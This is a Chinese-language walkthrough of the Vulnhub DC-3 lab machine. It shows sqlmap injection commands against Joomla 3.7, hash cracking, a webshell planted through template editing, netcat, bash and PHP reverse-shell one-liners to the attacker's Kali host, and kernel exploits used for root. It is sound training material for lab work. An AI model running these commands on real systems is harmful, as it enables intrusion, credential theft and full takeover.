【Vulnhub靶机系列】DC3

本信息

Kali:192.168.61.145 

DC3:192.168.61.163

实验过程

       同样先通过arpscan扫描找出DC3的IP地址

 

sudo arp‐scan ‐‐interface eth0 192.168.61.1/24

 

【Vulnhub靶机系列】DC3

 

这里可以直接看出DC3的IP地址为192.168.61.163

然后我们使用nmap对目标进行扫描

发现目标主机只是打开了80端口

【Vulnhub靶机系列】DC3

 

然后我们查看下80端口,通过wappalyzer,发现用的是Joomla

同时主页也给我们提示,表明这个靶机只有一个flag

【Vulnhub靶机系列】DC3

【Vulnhub靶机系列】DC3

这里我们使用joomscan专用扫描器,来获取网页更详细的信息

joomscan:https://github.com/OWASP/joomscan

perl joomscan.pl ‐u http://192.168.61.163

可以看到joomla的详细版本号和管理后台

【Vulnhub靶机系列】DC3

 

我们通过searchsploit查看是否有可以用的EXP

searchsploit joomla 3.7

【Vulnhub靶机系列】DC3

可以看到有一个SQL注入漏洞

searchsploit ‐x php/webapps/42033.txt

【Vulnhub靶机系列】DC3

sqlmap -u "http://192.168.61.163/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml%27" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]

【Vulnhub靶机系列】DC3

接下来就是导出admin的账号密码,就只放个最后的结果图,攻击过程的语句如下:

sqlmap -u "http://192.168.61.163/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml%27" --risk=3 --level=5 --random-agent -p list[fullordering] -D joomaladb --tables

sqlmap -u "http://192.168.61.163/index.php?
option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml%27" ‐‐risk=3 ‐‐
level=5 ‐‐random‐agent ‐p list[fullordering] ‐D joomladb ‐T "#__users" ‐‐columns

sqlmap ‐u "http://192.168.61.163/index.php?
option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml%27" ‐‐risk=3 ‐‐
level=5 ‐‐random‐agent ‐p list[fullordering] ‐D joomladb ‐T "#__users" ‐C "username,password" ‐‐dump

【Vulnhub靶机系列】DC3

【Vulnhub靶机系列】DC3

我们将password的HASH值用john进行破解

【Vulnhub靶机系列】DC3

【Vulnhub靶机系列】DC3

解密后的结果为:snoopy

我们尝试进行登陆,发现是正确的账号密码

 

账号:admin密码:snoopy

【Vulnhub靶机系列】DC3

【Vulnhub靶机系列】DC3

进入后台后,就要想办法上传一句话木马。百度到可以编辑模板来上传一个webshell

【Vulnhub靶机系列】DC3

这里编辑Beez3模板

【Vulnhub靶机系列】DC3

这里我在html目录下创建了一个名为dfz.php的webshell

【Vulnhub靶机系列】DC3

然后我们访问下这个webshell,没有出现404说明成功上传

 

http://192.168.61.163/templates/beez3/html/dfz.php

 

【Vulnhub靶机系列】DC3

接下来用蚁剑来链接

【Vulnhub靶机系列】DC3

我们在Kali上使用nc,通过蚁剑反弹一个shell

我们现在Kali上建立监听

【Vulnhub靶机系列】DC3

发现DC3上有python环境,尝试使用python来弹shell,但是Kali上没有任何反应

【Vulnhub靶机系列】DC3

然后尝试使用bash来弹shell,但是也是不行

【Vulnhub靶机系列】DC3

尝试使用nc反弹成功

 

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh ‐i 2>&1|nc 192.168.61.145 2222 >/tmp/f

【Vulnhub靶机系列】DC3

【Vulnhub靶机系列】DC3

然后使用python改善shell环境

python ‐c "import pty;pty.spawn('/bin/bash')"

 

【Vulnhub靶机系列】DC3

获取下Linux版本,可以看到是Ubuntu 16.04

【Vulnhub靶机系列】DC3

我们查找下有没有可以利用的提权EXP,通过searchsploit有好几个

【Vulnhub靶机系列】DC3

这里我们使用下面的EXP尝试提权

​​​​​​​

Linux Kernel 4.4.x (Ubuntu 16.04) ‐ 'double‐fdput()' bpf(BPF_PROG_LOAD) PrivilegeEscalation                                               | linux/local/39772.txt

我们打开这个EXP的介绍,并到指定网站下载

【Vulnhub靶机系列】DC3

 

https://github.com/offensive‐security/exploitdb‐bin‐sploits/blob/master/bin‐sploits/39772.zip

通过蚁剑上传到靶机

【Vulnhub靶机系列】DC3

然后接下来的话就是解压、编译、执行EXP来获得root权限,所有命令如下

unzip 39772.zipcd 39772tar ‐xvf exploit.tar

 

【Vulnhub靶机系列】DC3

  •  
./compile.sh

【Vulnhub靶机系列】DC3

  •  
./doubleput

【Vulnhub靶机系列】DC3

获得flag

【Vulnhub靶机系列】DC3

 

额外补充


利用php反弹shell

 

system("bash ‐c 'bash ‐i >& /dev/tcp/192.168.61.145/2222 0>&1'");

【Vulnhub靶机系列】DC3

【Vulnhub靶机系列】DC3

  •  
system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh ‐i 2>&1|nc 192.168.61.145 2222>/tmp/f');

 

【Vulnhub靶机系列】DC3

 

【Vulnhub靶机系列】DC3


 

使用Linux-Exploit-suggestion来辅助提权

下载地址:https://github.com/mzet-/linux-exploit-suggester

上传到/tmp中,并加权执行

 

chmod +x linux‐exploit‐suggester.sh

 

【Vulnhub靶机系列】DC3

【Vulnhub靶机系列】DC3

 

【Vulnhub靶机系列】DC3

这里尝试下CVE-2016-5195

EXP地址:https://github.com/gbonacini/CVE-2016-5195

下载完成后通过蚁剑上传,并解压

【Vulnhub靶机系列】DC3

【Vulnhub靶机系列】DC3

然后进入目录后make下就可以得到dcow文件,执行./dcow -s 尝试提权

然后靶机就死机了,说明这个EXP不适合

【Vulnhub靶机系列】DC3

上一篇:Text fields are not optimised for operations that require per-document field data like aggregations


下一篇:jvm源码解读--09 创建oop对象,将static静态变量放置在oop的96 offset处 第二篇